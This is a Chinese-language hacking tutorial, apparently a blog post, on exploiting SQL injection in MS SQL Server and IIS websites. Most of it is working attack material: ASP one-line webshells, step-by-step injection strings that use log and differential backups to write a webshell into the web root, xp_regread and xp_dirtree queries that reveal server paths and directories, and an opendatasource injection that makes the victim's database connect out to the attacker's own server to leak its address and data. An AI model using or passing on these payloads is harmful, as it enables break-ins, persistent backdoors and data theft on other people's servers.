<%eval(request("a")):response.end%> 備分專用一句話
加個response.end會有不一樣的效果,也就是插入一句話後所有的代碼都無效,在一句話這裏打止,也就減小了webshell的大小. 日誌備分WEBSHELL標準的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL設置成日誌完全恢復模式) 2.InjectionURL';create table cmd (a image)-- (新建立一個cmd表) 3.InjectionURL';backup log XXX to disk = 'c:/cmd' with init-- (減少備分數據的大小) 4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句話木馬) 5.InjectionURL';backup log XXX to disk = 'd:/chinakm/test.asp'-- (備分日誌到WEB路徑) 6.InjectionURL';drop table cmd-- (刪除新建的cmd表) 7.InjectionURL';alter database XXX set RECOVERY SIMPLE--(把SQL設置成日誌簡單恢復模式) 注:InjectionURL是注入點,XXX是數據庫名稱. 附上DB_ONER權限HACK的其他技巧,希望對菜菜有所幫助,高手略過. 數據庫差異備份代碼: 1、create table [dbo].[jm_tmp] ([cmd] [image])-- 創建一個表 2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --備份數據庫,@s爲備份名稱(jmdcw的16進制轉換) 3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--將一句話木馬 "<%execute(request("l"))%>"的16進制字符插入到表中 4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/40/isapi/hsqq.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --對數據庫實行差異備份,備份的保存路徑暫定爲C盤目錄,文件名爲hsqq.asp。 5、drop table [jm_tmp]-- 刪除此表。 網站物理路徑讀取代碼: 1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 創建表 2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/'-- 將網站目錄插到表字段中 3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段 4、drop table [jm_tmp]-- 刪除此表。 磁盤目錄讀取代碼: 1、drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 創建表 2、delete [jm_tmp];insert [jm_tmp] exec master..xp_dirtree 'C:/',1,1-- 將C盤的文件夾及文件插入到表中 3、 and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第一個文件夾名稱 4、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第二個文件夾名稱 5、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第X個文件夾或文件名稱 6、drop table [jm_tmp]--刪除此表 網站物理路徑讀取代碼: 1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 創建表 2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/'-- 將網站目錄插到表字段中 3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段 4、drop table [jm_tmp]-- 刪除此表。 注射過程中DB_ONER權限並且主機與數據庫不在一起的搞法 其實.即使數據庫和WEB不在一塊還是有機會搞的.並不是說一點機會沒.一般服務器裝好系統什麼的.都會裝個IIS吧?列他C盤.看看有沒有Inetpub 這個目錄.就知道他有沒有裝IIS了.但是.不知道他IP也?怎麼辦呢?可以這樣來,PING一下WEB服務器.掃他這一C段的1433端口.看看哪臺開了.不過這方法也不好.現在很多主機都啓用了防火牆.1433端口就算開了你也掃不着.這該怎麼辦呢?可以利用opendatasource宏讓對方的 SQL與自己的數據庫建立連接.既然能建立連接.就可以得到數據庫服務器的IP地址了.我們來試試看.有幾個前提得說一下.第一.你機器必須要有公網 IP.而且開放的1433端口要保證能被外網訪問到.好.條件滿足.就開始做吧! 我現在搞的這站.100%數據和WEB不在一塊.但是從C盤看到了Inetpub文件夾.說明這數據庫服務器安裝了IIS.但是得不到他IP呀.怎麼搞哦.簡單.就用上面所說的方法搞一下.先在本機建個庫先.打開查詢分析器輸入 create database hack520 create TABLE zhu(name nvarchar(256) null);create TABLE J8(id int NULL,name nvarchar(256) null); 點執行. 建立了一個hack520的庫名.和zhu J8兩個表.zhu裏面有name這一個字段.J8也放了兩字段名.一個是id一個是name.好了.現在就可以開始建立連接了~~~~~~~先看一下這條SQL語句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用戶;pwd=SQL密碼;database=建立的庫名') .庫名.表名 '執行的語句' 恩現在開始吧... http://www.xxx.com/news.as... ... asource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 在IE上執行咯.呵呵這個時候對方就會連接到我機器的SQL服務器.不信?netstat -an看一下 在CMD下輸入命令: netstat -an | find "1433" |
備分專用一句話
備分專用一句話
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.